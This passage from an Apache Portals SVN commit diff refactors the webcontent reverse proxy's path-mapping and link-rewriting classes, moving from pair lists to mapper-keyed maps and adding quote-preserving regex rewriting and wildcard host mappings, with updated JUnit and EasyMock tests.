proxyPathMapper = + new DefaultHttpReverseProxyPathMapperImpl(pathName, localBasePath, remoteBaseURL); + proxyPathMappers.add(proxyPathMapper); Configuration rewritersConf = pathPassConf.subset("rewriter"); @@ -158,25 +158,33 @@ if (rewriterController != null) { - rewriterControllerPairs.add(new DefaultKeyValue(localBasePath, rewriterController)); + rewriterControllerMap.put(proxyPathMapper, rewriterController); String rules = rewritersConf.getString("rules"); Ruleset ruleset = loadRewriterRuleset(rewriterController, rules); if (ruleset != null) { - rewriterRulesetPairs.add(new DefaultKeyValue(localBasePath, ruleset)); + rewriterRulesetMap.put(proxyPathMapper, ruleset); } } } } - } - catch (Exception e) - { - throw new ServletException("Failed to initialize url mappings. " + e); + catch (Exception e) + { + if (log.isDebugEnabled()) + { + log.error("Failure in initializing path mappings.", e); + } + else + { + log.error("Failure in initializing path mappings. {}", e.toString()); + } + } } - HttpReverseProxyPathMapperProvider proxyPathMapperProvider = new DefaultHttpReverseProxyPathMapperProviderImpl(proxyPathMappers, rewriterControllerPairs, rewriterRulesetPairs); + HttpReverseProxyPathMapperProvider proxyPathMapperProvider = + new DefaultHttpReverseProxyPathMapperProviderImpl(proxyPathMappers, rewriterControllerMap, rewriterRulesetMap); HttpReverseProxyService tempProxyService = new RewritableHttpReverseProxyServiceImpl(proxyPathMapperProvider); Configuration serverConf = configuration.subset("proxy.server"); Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/PassMappingLinkRewritingParserAaptor.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/PassMappingLinkRewritingParserAaptor.java?rev=820733&r1=820732&r2=820733&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/PassMappingLinkRewritingParserAaptor.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/PassMappingLinkRewritingParserAaptor.java Thu Oct 1 17:56:43 2009 @@ -24,6 +24,8 @@ import java.util.regex.Matcher; import java.util.regex.Pattern; +import org.apache.commons.collections.KeyValue; +import org.apache.commons.collections.keyvalue.DefaultKeyValue; import org.apache.commons.io.IOUtils; import org.apache.commons.io.LineIterator; import org.apache.commons.lang.StringUtils; @@ -34,6 +36,8 @@ import org.apache.portals.applications.webcontent.rewriter.ParserAdaptor; import org.apache.portals.applications.webcontent.rewriter.Rewriter; import org.apache.portals.applications.webcontent.rewriter.RewriterException; +import org.slf4j.Logger; +import org.slf4j.LoggerFactory; /** * A simple reverse proxy link rewriting parser adaptor implementation. @@ -46,17 +50,29 @@ public class PassMappingLinkRewritingParserAaptor implements ParserAdaptor, ReverseProxyRewritingContextAware { - private ReverseProxyRewritingContext reverseProxyRewritingContext; + private static Logger log = LoggerFactory.getLogger(PassMappingLinkRewritingParserAaptor.class); - private Pattern linkBasePathPattern = Pattern.compile("\\s(href|src|action)\\s*=\\s*['\"]((\\/)[^'\"]+)['\"]", Pattern.CASE_INSENSITIVE); + protected boolean lookUpAllMappings = true; - private String [] linkRemoteBaseURLSearches = { "/", "." }; - private String [] linkRemoteBaseURLReplaces = { "\\/", "\\." }; + protected ReverseProxyRewritingContext reverseProxyRewritingContext; + + protected Pattern linkBasePathPattern = Pattern.compile("\\s(href|src|action)\\s*=\\s*(['\"])((\\/)[^'\"]+)['\"]", Pattern.CASE_INSENSITIVE); + + protected String [] linkRemoteBaseURLSearches = { "/", "." }; + protected String [] linkRemoteBaseURLReplaces = { "\\/", "\\." }; + + private KeyValue [] remoteURLPatternReplacesPairs; + private KeyValue myURLPatternReplacesPair; public PassMappingLinkRewritingParserAaptor() { } + public PassMappingLinkRewritingParserAaptor(boolean lookUpAllMappings) + { + this.lookUpAllMappings = lookUpAllMappings; + } + public void setReverseProxyRewritingContext(ReverseProxyRewritingContext reverseProxyRewritingContext) { this.reverseProxyRewritingContext = reverseProxyRewritingContext; @@ -64,42 +80,45 @@ public void rewrite(Rewriter rewriter, Reader reader, Writer writer) throws RewriterException { - HttpReverseProxyPathMapperProvider mapperProvider = reverseProxyRewritingContext.getHttpReverseProxyPathMapperProvider(); - HttpReverseProxyPathMapper myProxyMapper = reverseProxyRewritingContext.getHttpReverseProxyPathMapper(); - String rewritingContextPath = reverseProxyRewritingContext.getRewritingContextPath(); - - String localBasePath = myProxyMapper.getLocalBasePath(); - String normalizedLocalBasePath = StringUtils.removeEnd(localBasePath, "/"); - - List<HttpReverseProxyPathMapper> proxyMappers = mapperProvider.getProxyPathMappers(); - int proxyMappersCount = proxyMappers.size(); - Pattern [] proxyMapperRemoteURLPatterns = new Pattern[proxyMappersCount]; - String [] proxyMapperMatcherReplaces = new String[proxyMappersCount]; - - int index = 0; - for (HttpReverseProxyPathMapper proxyMapper : proxyMappers) - { - String remoteBaseURLPattern = StringUtils.replaceEach(StringUtils.removeEnd(proxyMapper.getRemoteBaseURL(), "/"), linkRemoteBaseURLSearches, linkRemoteBaseURLReplaces); - proxyMapperRemoteURLPatterns[index] = Pattern.compile("\\s(href|src|action)\\s*=\\s*['\"](" + remoteBaseURLPattern + "([^'\"]+))['\"]", Pattern.CASE_INSENSITIVE); - proxyMapperMatcherReplaces[index] = rewritingContextPath + StringUtils.removeEnd(proxyMapper.getLocalBasePath(), "/"); - ++index; - } + String myLocalPathMatchingReplaces = createLocalPathMatchingReplaces(reverseProxyRewritingContext.getHttpReverseProxyPathMapper()); PrintWriter out = new PrintWriter(new BufferedWriter(writer)); for (LineIterator lineIt = IOUtils.lineIterator(reader); lineIt.hasNext(); ) { String line = lineIt.nextLine(); + String tempLine = line; - // first, replace slash leading relative paths by slash leading reverse proxying relative paths. - Matcher linkBasePathMatcher = linkBasePathPattern.matcher(line); - line = linkBasePathMatcher.replaceAll(" $1=\"" + rewritingContextPath + normalizedLocalBasePath + "$2\""); - - // second, replace absolute urls by slash leading relative paths. - for (int i = 0; i < proxyMappersCount; i++) + if (!StringUtils.isBlank(line)) { - Matcher otherLinkBasePathMatcher = proxyMapperRemoteURLPatterns[i].matcher(line); - line = otherLinkBasePathMatcher.replaceAll(" $1=\"" + proxyMapperMatcherReplaces[i] + "$3\""); + try + { + // first, replace slash leading relative paths by slash leading reverse proxying relative paths. + Matcher linkBasePathMatcher = linkBasePathPattern.matcher(tempLine); + tempLine = linkBasePathMatcher.replaceAll(" $1=$2" + myLocalPathMatchingReplaces + "$3$2"); + + // second, replace absolute urls by slash leading relative paths. + if (lookUpAllMappings) + { + for (KeyValue pair : getRemoteURLPatternReplacesPairs()) + { + Matcher otherLinkBasePathMatcher = ((Pattern) pair.getKey()).matcher(tempLine); + tempLine = otherLinkBasePathMatcher.replaceAll(" $1=$2" + ((String) pair.getValue()) + "$5$2"); + } + } + else + { + KeyValue pair = getMyURLPatternReplacesPair(); + Matcher otherLinkBasePathMatcher = ((Pattern) pair.getKey()).matcher(tempLine); + tempLine = otherLinkBasePathMatcher.replaceAll(" $1=$2" + ((String) pair.getValue()) + "$5$2"); + } + + line = tempLine; + } + catch (Exception e) + { + log.warn("Error during {}: {}", "replacement", e); + } } out.println(line); @@ -108,6 +127,58 @@ out.flush(); } + protected Pattern createRemoteURLMatchingPattern(HttpReverseProxyPathMapper proxyMapper) + { + Pattern pattern = null; + String remoteBaseURLPattern = null; + + log.info("remoteBaseURL: {}", proxyMapper.getRemoteBaseURL()); + log.info("replaced: {}", StringUtils.replaceEach(StringUtils.removeEnd(proxyMapper.getRemoteBaseURL(), "/"), linkRemoteBaseURLSearches, linkRemoteBaseURLReplaces)); + + remoteBaseURLPattern = StringUtils.replaceEach(StringUtils.removeEnd(proxyMapper.getRemoteBaseURL(), "/"), linkRemoteBaseURLSearches, linkRemoteBaseURLReplaces); + pattern = Pattern.compile("\\s(href|src|action)\\s*=\\s*(['\"])((" + remoteBaseURLPattern + ")([^'\"]+))['\"]", Pattern.CASE_INSENSITIVE); + + return pattern; + } + + protected String createLocalPathMatchingReplaces(HttpReverseProxyPathMapper proxyMapper) + { + return reverseProxyRewritingContext.getRewritingContextPath() + StringUtils.removeEnd(proxyMapper.getLocalBasePath(), "/"); + } + + protected KeyValue [] getRemoteURLPatternReplacesPairs() + { + if (remoteURLPatternReplacesPairs == null) + { + HttpReverseProxyPathMapperProvider mapperProvider = reverseProxyRewritingContext.getHttpReverseProxyPathMapperProvider(); + List<HttpReverseProxyPathMapper> proxyMappers = mapperProvider.getProxyPathMappers(); + int proxyMappersCount = proxyMappers.size(); + remoteURLPatternReplacesPairs = new KeyValue[proxyMappersCount]; + + int index = 0; + for (HttpReverseProxyPathMapper proxyMapper : proxyMappers) + { + remoteURLPatternReplacesPairs[index] = + new DefaultKeyValue(createRemoteURLMatchingPattern(proxyMapper), + createLocalPathMatchingReplaces(proxyMapper)); + ++index; + } + } + + return remoteURLPatternReplacesPairs; + } + + protected KeyValue getMyURLPatternReplacesPair() + { + if (myURLPatternReplacesPair == null) + { + HttpReverseProxyPathMapper proxyMapper = reverseProxyRewritingContext.getHttpReverseProxyPathMapper(); + myURLPatternReplacesPair = new DefaultKeyValue(createRemoteURLMatchingPattern(proxyMapper), createLocalPathMatchingReplaces(proxyMapper)); + } + + return myURLPatternReplacesPair; + } + public void parse(Rewriter rewriter, Reader reader) throws RewriterException { throw new UnsupportedOperationException(); Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/RewritableHttpReverseProxyServiceImpl.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/RewritableHttpReverseProxyServiceImpl.java?rev=820733&r1=820732&r2=820733&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/RewritableHttpReverseProxyServiceImpl.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/RewritableHttpReverseProxyServiceImpl.java Thu Oct 1 17:56:43 2009 @@ -420,7 +420,7 @@ httpRequest.abort(); httpEntity = null; - throw new IOException(e.getLocalizedMessage()); + throw new IOException(e.toString()); } finally { @@ -431,7 +431,9 @@ } } - private void writeHttpEntityToClient(HttpServletRequest request, HttpServletResponse response, HttpEntity httpEntity, HttpReverseProxyPathMapper proxyPathMapper, String rewriterContextPath) throws IOException + private void writeHttpEntityToClient(HttpServletRequest request, HttpServletResponse response, + HttpEntity httpEntity, + HttpReverseProxyPathMapper proxyPathMapper, String rewriterContextPath) throws IOException { InputStream in = null; Reader reader = null; @@ -448,12 +450,12 @@ { out = response.getOutputStream(); - RewriterController rewriterController = proxyPathMapperProvider.findRewriterController(request); + RewriterController rewriterController = proxyPathMapperProvider.getRewriterController(proxyPathMapper); Rewriter rewriter = null; if (rewriterController != null) { - Ruleset rewriterRuleset = proxyPathMapperProvider.findRewriterRuleset(request); + Ruleset rewriterRuleset = proxyPathMapperProvider.getRewriterRuleset(proxyPathMapper); if (rewriterRuleset == null) { Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/SimpleLinkRewritingParserAaptor.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/SimpleLinkRewritingParserAaptor.java?rev=820733&r1=820732&r2=820733&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/SimpleLinkRewritingParserAaptor.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/SimpleLinkRewritingParserAaptor.java Thu Oct 1 17:56:43 2009 @@ -16,85 +16,17 @@ */ package org.apache.portals.applications.webcontent.proxy.impl; -import java.io.BufferedWriter; -import java.io.PrintWriter; -import java.io.Reader; -import java.io.Writer; -import java.util.regex.Matcher; -import java.util.regex.Pattern; - -import org.apache.commons.io.IOUtils; -import org.apache.commons.io.LineIterator; -import org.apache.commons.lang.StringUtils; -import org.apache.portals.applications.webcontent.proxy.HttpReverseProxyPathMapper; -import org.apache.portals.applications.webcontent.proxy.ReverseProxyRewritingContext; -import org.apache.portals.applications.webcontent.proxy.ReverseProxyRewritingContextAware; -import org.apache.portals.applications.webcontent.rewriter.ParserAdaptor; -import org.apache.portals.applications.webcontent.rewriter.Rewriter; -import org.apache.portals.applications.webcontent.rewriter.RewriterException; /** - * A simple reverse proxy link rewriting parser adaptor implementation. - * <P> - * You can refer to this example to implement more sophisticated rewriting parser adaptor. - * </P> + * A simple reverse proxy link rewriting parser adaptor implementation. + * <P>This adaptor looks up its own proxy path mapper only.</P> * * @version $Id$ */ -public class SimpleLinkRewritingParserAaptor implements ParserAdaptor, ReverseProxyRewritingContextAware +public class SimpleLinkRewritingParserAaptor extends PassMappingLinkRewritingParserAaptor { - - private ReverseProxyRewritingContext reverseProxyRewritingContext; - - private Pattern linkBasePathPattern = Pattern.compile("\\s(href|src|action)\\s*=\\s*['\"]((\\/)[^'\"]+)['\"]", Pattern.CASE_INSENSITIVE); - - private String [] linkRemoteBaseURLSearches = { "/", "." }; - private String [] linkRemoteBaseURLReplaces = { "\\/", "\\." }; - public SimpleLinkRewritingParserAaptor() { + super(false); } - - public void setReverseProxyRewritingContext(ReverseProxyRewritingContext reverseProxyRewritingContext) - { - this.reverseProxyRewritingContext = reverseProxyRewritingContext; - } - - public void rewrite(Rewriter rewriter, Reader reader, Writer writer) throws RewriterException - { - HttpReverseProxyPathMapper myProxyMapper = reverseProxyRewritingContext.getHttpReverseProxyPathMapper(); - String rewritingContextPath = reverseProxyRewritingContext.getRewritingContextPath(); - - String localBasePath = myProxyMapper.getLocalBasePath(); - String normalizedLocalBasePath = StringUtils.removeEnd(localBasePath, "/"); - - String remoteBaseURLPattern = StringUtils.replaceEach(StringUtils.removeEnd(myProxyMapper.getRemoteBaseURL(), "/"), linkRemoteBaseURLSearches, linkRemoteBaseURLReplaces); - Pattern proxyMapperRemoteURLPattern = Pattern.compile("\\s(href|src|action)\\s*=\\s*['\"](" + remoteBaseURLPattern + "([^'\"]+))['\"]", Pattern.CASE_INSENSITIVE); - String proxyMapperMatcherReplace = rewritingContextPath + StringUtils.removeEnd(myProxyMapper.getLocalBasePath(), "/"); - - PrintWriter out = new PrintWriter(new BufferedWriter(writer)); - - for (LineIterator lineIt = IOUtils.lineIterator(reader); lineIt.hasNext(); ) - { - String line = lineIt.nextLine(); - - // first, replace slash leading relative paths by slash leading reverse proxying relative paths. - Matcher linkBasePathMatcher = linkBasePathPattern.matcher(line); - line = linkBasePathMatcher.replaceAll(" $1=\"" + rewritingContextPath + normalizedLocalBasePath + "$2\""); - - // second, replace absolute urls by slash leading relative paths. - Matcher otherLinkBasePathMatcher = proxyMapperRemoteURLPattern.matcher(line); - line = otherLinkBasePathMatcher.replaceAll(" $1=\"" + proxyMapperMatcherReplace + "$3\""); - - out.println(line); - } - - out.flush(); - } - - public void parse(Rewriter rewriter, Reader reader) throws RewriterException - { - throw new UnsupportedOperationException(); - } - } Added: portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestProxyPathMappings.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestProxyPathMappings.java?rev=820733&view=auto ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestProxyPathMappings.java (added) +++ portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestProxyPathMappings.java Thu Oct 1 17:56:43 2009 @@ -0,0 +1,103 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package org.apache.portals.applications.webcontent.proxy; + +import java.util.ArrayList; +import java.util.HashMap; +import java.util.List; +import java.util.Map; + +import javax.servlet.http.HttpServletRequest; + +import junit.framework.TestCase; + +import org.apache.portals.applications.webcontent.proxy.impl.DefaultHttpReverseProxyPathMapperImpl; +import org.apache.portals.applications.webcontent.proxy.impl.DefaultHttpReverseProxyPathMapperProviderImpl; +import org.apache.portals.applications.webcontent.rewriter.RewriterController; +import org.apache.portals.applications.webcontent.rewriter.rules.Ruleset; +import org.easymock.EasyMock; + +/** + * TestProxyPassMappings + * + * @version $Id$ + */ +public class TestProxyPathMappings extends TestCase +{ + private HttpReverseProxyPathMapperProvider pathMapperProvider; + + @Override + public void setUp() + { + Map<HttpReverseProxyPathMapper, RewriterController> rewriterControllerMap = new HashMap<HttpReverseProxyPathMapper, RewriterController>(); + Map<HttpReverseProxyPathMapper, Ruleset> rewriterRulesetMap = new HashMap<HttpReverseProxyPathMapper, Ruleset>(); + List<HttpReverseProxyPathMapper> proxyPathMappers = new ArrayList<HttpReverseProxyPathMapper>(); + proxyPathMappers.add(new DefaultHttpReverseProxyPathMapperImpl("localhost", "/localhost/", "http://www.localhost.com/")); + proxyPathMappers.add(new DefaultHttpReverseProxyPathMapperImpl("apache", "/*_apache/", "http://$1.apache.org/")); + pathMapperProvider = new DefaultHttpReverseProxyPathMapperProviderImpl(proxyPathMappers, rewriterControllerMap, rewriterRulesetMap); + } + + public void testProxyPathMappings() throws Exception + { + HttpReverseProxyPathMapper mapper = null; + HttpServletRequest request = EasyMock.createNiceMock(HttpServletRequest.class); + + EasyMock.reset(request); + EasyMock.expect(request.getPathInfo()).andReturn("/localhost/index.html"); + EasyMock.replay(request); + + mapper = pathMapperProvider.findMapper(request); + assertEquals("localhost", mapper.getName()); + mapper = pathMapperProvider.findMapperByRemoteURL("http://www.localhost.com/index.html"); + assertEquals("localhost", mapper.getName()); + + EasyMock.reset(request); + EasyMock.expect(request.getPathInfo()).andReturn("/www_apache/index.html"); + EasyMock.replay(request); + + mapper = pathMapperProvider.findMapper(request); + assertEquals("apache:/www_apache/", mapper.getName()); + mapper = pathMapperProvider.findMapperByRemoteURL("http://www.apache.org/index.html"); + assertEquals("apache:/www_apache/", mapper.getName()); + assertEquals("http://www.apache.org/index.html", mapper.getRemoteURL("/www_apache/index.html")); + assertEquals("/www_apache/index.html", mapper.getLocalPath("http://www.apache.org/index.html")); + + EasyMock.reset(request); + EasyMock.expect(request.getPathInfo()).andReturn("/portals_apache/index.html"); + EasyMock.replay(request); + + mapper = pathMapperProvider.findMapper(request); + assertEquals("apache:/portals_apache/", mapper.getName()); + mapper = pathMapperProvider.findMapperByRemoteURL("http://portals.apache.org/index.html"); + assertEquals("apache:/portals_apache/", mapper.getName()); + assertEquals("http://portals.apache.org/index.html", mapper.getRemoteURL("/portals_apache/index.html")); + assertEquals("/portals_apache/index.html", mapper.getLocalPath("http://portals.apache.org/index.html")); + } + + public void testProxyURLMappings() throws Exception + { + HttpReverseProxyPathMapper mapper = pathMapperProvider.findMapperByRemoteURL("http://www.apache.org/index.html"); + assertEquals("/www_apache/", mapper.getLocalBasePath()); + + mapper = pathMapperProvider.findMapperByRemoteURL("http://portals.apache.org/index.html"); + assertEquals("/portals_apache/", mapper.getLocalBasePath()); + + mapper = pathMapperProvider.findMapperByRemoteURL("http://www.localhost.com/index.html"); + assertEquals("/localhost/", mapper.getLocalBasePath()); + } + +} Propchange: portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestProxyPathMappings.java ------------------------------------------------------------------------------ svn:eol-style = native Propchange: portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestProxyPathMappings.java ------------------------------------------------------------------------------ svn:keywords = Id Propchange: portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestProxyPathMappings.java ------------------------------------------------------------------------------ svn:mime-type = text/plain Modified: portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestReverseProxyLinkRewritingParserAaptor.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestReverseProxyLinkRewritingParserAaptor.java?rev=820733&r1=820732&r2=820733&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestReverseProxyLinkRewritingParserAaptor.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestReverseProxyLinkRewritingParserAaptor.java Thu Oct 1 17:56:43 2009 @@ -18,8 +18,12 @@ import java.io.StringReader; import java.io.StringWriter; -import java.util.Arrays; +import java.util.ArrayList; +import java.util.HashMap; import java.util.List; +import java.util.Map; + +import javax.servlet.http.HttpServletRequest; import junit.framework.TestCase; @@ -29,7 +33,11 @@ import org.apache.portals.applications.webcontent.proxy.impl.DefaultHttpReverseProxyPathMapperProviderImpl; import org.apache.portals.applications.webcontent.proxy.impl.DefaultReverseProxyRewritingContext; import org.apache.portals.applications.webcontent.proxy.impl.PassMappingLinkRewritingParserAaptor; -import org.apache.portals.applications.webcontent.proxy.impl.SimpleLinkRewritingParserAaptor; +import org.apache.portals.applications.webcontent.rewriter.RewriterController; +import org.apache.portals.applications.webcontent.rewriter.rules.Ruleset; +import org.easymock.EasyMock; +import org.slf4j.Logger; +import org.slf4j.LoggerFactory; /** * TestSimpleLinkRewritingParserAaptor @@ -39,64 +47,75 @@ public class TestReverseProxyLinkRewritingParserAaptor extends TestCase { + private static Logger log = LoggerFactory.getLogger(TestReverseProxyLinkRewritingParserAaptor.class); + private String html = "<html>\n" + "<p><a href=\"mission.html\">Mission</a> and <a href='about.html'>About</a></p>\n" + - "<p><a href=\"/docs/\">Documents</a></p>\n" + + "<p><a href=\"/docs/\">Docs</a> and <a href='/documents/'>Documents</a></p>\n" + "<p><a href=\"http://portals.apache.org/projectinfo.html\">Project Info.</a></p>\n" + - "<p><a href=\"http://www.apache.org/events.html\">Events</a></p>\n" + + "<p><a href=\"http://www.apache.org/events.html\">Events</a> <a href='http://www.apache.org/apachecon.html'>Apache Con</a></p>\n" + + "<p><a href=\"http://www.localhost.com/manager/list\">Application Management</a> <a href='http://www.localhost.com/manager/start'>Start Application</a></p>\n" + "</html>"; - public void testSimpleRewriting() throws Exception + private HttpReverseProxyPathMapperProvider proxyPathMapperProvider; + private HttpReverseProxyPathMapper apacheProxyPathMapper; + private HttpReverseProxyPathMapper localhostProxyPathMapper; + + @Override + public void setUp() { - SimpleLinkRewritingParserAaptor parserAdaptor = new SimpleLinkRewritingParserAaptor(); - HttpReverseProxyPathMapper portalsProxyPathMapper = new DefaultHttpReverseProxyPathMapperImpl("/portals/", "http://portals.apache.org/"); - HttpReverseProxyPathMapper apacheProxyPathMapper = new DefaultHttpReverseProxyPathMapperImpl("/apache/", "http://www.apache.org/"); - HttpReverseProxyPathMapper localhostProxyPathMapper = new DefaultHttpReverseProxyPathMapperImpl("/localhost/", "http://www.localhost.com/"); - HttpReverseProxyPathMapperProvider proxyPathMapperProvider = - new DefaultHttpReverseProxyPathMapperProviderImpl(Arrays.asList(new HttpReverseProxyPathMapper [] { portalsProxyPathMapper, apacheProxyPathMapper, localhostProxyPathMapper }), null, null); - - ReverseProxyRewritingContext rewritingContext = - new DefaultReverseProxyRewritingContext(portalsProxyPathMapper, proxyPathMapperProvider, "/webcontent/rproxy"); - parserAdaptor.setReverseProxyRewritingContext(rewritingContext); - - StringReader reader = new StringReader(html); - StringWriter writer = new StringWriter(); - parserAdaptor.rewrite(null, reader, writer); + apacheProxyPathMapper = new DefaultHttpReverseProxyPathMapperImpl("apache", "/*_apache/", "http://$1.apache.org/"); + localhostProxyPathMapper = new DefaultHttpReverseProxyPathMapperImpl("localhost", "/localhost/", "http://www.localhost.com/"); - List<String> lines = (List<String>) IOUtils.readLines(new StringReader(writer.toString())); + Map<HttpReverseProxyPathMapper, RewriterController> rewriterControllerMap = new HashMap<HttpReverseProxyPathMapper, RewriterController>(); + Map<HttpReverseProxyPathMapper, Ruleset> rewriterRulesetMap = new HashMap<HttpReverseProxyPathMapper, Ruleset>(); + List<HttpReverseProxyPathMapper> proxyPathMappers = new ArrayList<HttpReverseProxyPathMapper>(); + proxyPathMappers.add(apacheProxyPathMapper); + proxyPathMappers.add(localhostProxyPathMapper); - assertTrue("Wrong rewriting: " + lines.get(1), StringUtils.contains(lines.get(1), "href=\"mission.html\"")); - assertTrue("Wrong rewriting: " + lines.get(1), StringUtils.contains(lines.get(1), "href='about.html'")); - assertTrue("Wrong rewriting: " + lines.get(2), StringUtils.contains(lines.get(2), "href=\"/webcontent/rproxy/portals/docs/\"")); - assertTrue("Wrong rewriting: " + lines.get(3), StringUtils.contains(lines.get(3), "href=\"/webcontent/rproxy/portals/projectinfo.html\"")); - assertTrue("Wrong rewriting: " + lines.get(4), StringUtils.contains(lines.get(4), "href=\"http://www.apache.org/events.html\"")); + proxyPathMapperProvider = new DefaultHttpReverseProxyPathMapperProviderImpl(proxyPathMappers, rewriterControllerMap, rewriterRulesetMap); } public void testPathMappingRewriting() throws Exception { - PassMappingLinkRewritingParserAaptor parserAdaptor = new PassMappingLinkRewritingParserAaptor(); - HttpReverseProxyPathMapper portalsProxyPathMapper = new DefaultHttpReverseProxyPathMapperImpl("/portals/", "http://portals.apache.org/"); - HttpReverseProxyPathMapper apacheProxyPathMapper = new DefaultHttpReverseProxyPathMapperImpl("/apache/", "http://www.apache.org/"); - HttpReverseProxyPathMapper localhostProxyPathMapper = new DefaultHttpReverseProxyPathMapperImpl("/localhost/", "http://www.localhost.com/"); - HttpReverseProxyPathMapperProvider proxyPathMapperProvider = - new DefaultHttpReverseProxyPathMapperProviderImpl(Arrays.asList(new HttpReverseProxyPathMapper [] { portalsProxyPathMapper, apacheProxyPathMapper, localhostProxyPathMapper }), null, null); - + HttpServletRequest request = EasyMock.createNiceMock(HttpServletRequest.class); + + EasyMock.reset(request); + EasyMock.expect(request.getPathInfo()).andReturn("/portals_apache/index.html"); + EasyMock.replay(request); + proxyPathMapperProvider.findMapper(request); + + EasyMock.reset(request); + EasyMock.expect(request.getPathInfo()).andReturn("/www_apache/index.html"); + EasyMock.replay(request); + ReverseProxyRewritingContext rewritingContext = - new DefaultReverseProxyRewritingContext(portalsProxyPathMapper, proxyPathMapperProvider, "/webcontent/rproxy"); + new DefaultReverseProxyRewritingContext(proxyPathMapperProvider.findMapper(request), + proxyPathMapperProvider, + "/webcontent/rproxy"); + + PassMappingLinkRewritingParserAaptor parserAdaptor = new PassMappingLinkRewritingParserAaptor(); parserAdaptor.setReverseProxyRewritingContext(rewritingContext); StringReader reader = new StringReader(html); StringWriter writer = new StringWriter(); parserAdaptor.rewrite(null, reader, writer); + log.info("source: \n" + html); + log.info("result: \n" + writer); + List<String> lines = (List<String>) IOUtils.readLines(new StringReader(writer.toString())); assertTrue("Wrong rewriting: " + lines.get(1), StringUtils.contains(lines.get(1), "href=\"mission.html\"")); assertTrue("Wrong rewriting: " + lines.get(1), StringUtils.contains(lines.get(1), "href='about.html'")); - assertTrue("Wrong rewriting: " + lines.get(2), StringUtils.contains(lines.get(2), "href=\"/webcontent/rproxy/portals/docs/\"")); - assertTrue("Wrong rewriting: " + lines.get(3), StringUtils.contains(lines.get(3), "href=\"/webcontent/rproxy/portals/projectinfo.html\"")); - assertTrue("Wrong rewriting: " + lines.get(4), StringUtils.contains(lines.get(4), "href=\"/webcontent/rproxy/apache/events.html\"")); + assertTrue("Wrong rewriting: " + lines.get(2), StringUtils.contains(lines.get(2), "href=\"/webcontent/rproxy/www_apache/docs/\"")); + assertTrue("Wrong rewriting: " + lines.get(2), StringUtils.contains(lines.get(2), "href='/webcontent/rproxy/www_apache/documents/'")); + assertTrue("Wrong rewriting: " + lines.get(3), StringUtils.contains(lines.get(3), "href=\"/webcontent/rproxy/portals_apache/projectinfo.html\"")); + assertTrue("Wrong rewriting: " + lines.get(4), StringUtils.contains(lines.get(4), "href=\"/webcontent/rproxy/www_apache/events.html\"")); + assertTrue("Wrong rewriting: " + lines.get(4), StringUtils.contains(lines.get(4), "href='/webcontent/rproxy/www_apache/apachecon.html'")); + assertTrue("Wrong rewriting: " + lines.get(5), StringUtils.contains(lines.get(5), "href=\"/webcontent/rproxy/localhost/manager/list\"")); + assertTrue("Wrong rewriting: " + lines.get(5), StringUtils.contains(lines.get(5), "href='/webcontent/rproxy/localhost/manager/start'")); } } Copied: portals/applications/webcontent/trunk/webcontent-jar/src/test/resources/log4j.properties (from r820182, portals/applications/webcontent/trunk/webcontent-jar/src/test/java/log4j.properties) URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/test/resources/log4j.properties?p2=portals/applications/webcontent/trunk/webcontent-jar/src/test/resources/log4j.properties&p1=portals/applications/webcontent/trunk/webcontent-jar/src/test/java/log4j.properties&r1=820182&r2=820733&rev=820733&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/test/java/log4j.properties (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/test/resources/log4j.properties Thu Oct 1 17:56:43 2009 